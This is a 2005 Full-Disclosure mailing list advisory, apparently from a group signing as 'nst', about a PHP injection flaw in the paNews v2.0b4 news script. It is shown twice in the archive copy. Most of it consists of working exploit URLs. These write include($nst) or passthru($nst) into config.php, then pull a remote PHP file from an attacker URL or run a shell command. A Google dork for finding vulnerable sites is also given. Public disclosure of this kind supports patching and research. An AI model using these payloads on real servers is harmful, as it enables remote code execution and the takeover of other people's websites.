[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] paNews v2.0b4 - PHP Injection
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] paNews v2.0b4 - PHP Injection
- From: tjomka <tjomka@xxxxxxxxxxxx>
- Date: Mon, 21 Feb 2005 07:16:47 +0200
oooo oooo oooooooo8 ooooooooooo
8888o 88 888 88 888 88
88 888o88 888oooooo 888
88 8888 888 888
o88o 88 o88oooo888 o888o
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************
web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4
PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable
p.s. please disable - javascripts =-]
Example 1
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://victim/panews/includes/config.php?nst=http://your/file.php
Example 2
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://victim/panews/includes/config.php?nst=id
oooo oooo oooooooo8 ooooooooooo
8888o 88 888 88 888 88
88 888o88 888oooooo 888
88 8888 888 888
o88o 88 o88oooo888 o888o
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************
web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4
PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable
p.s. please disable - javascripts =-]
Example 1
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://victim/panews/includes/config.php?nst=http://your/file.php
Example 2
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://victim/panews/includes/config.php?nst=id
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html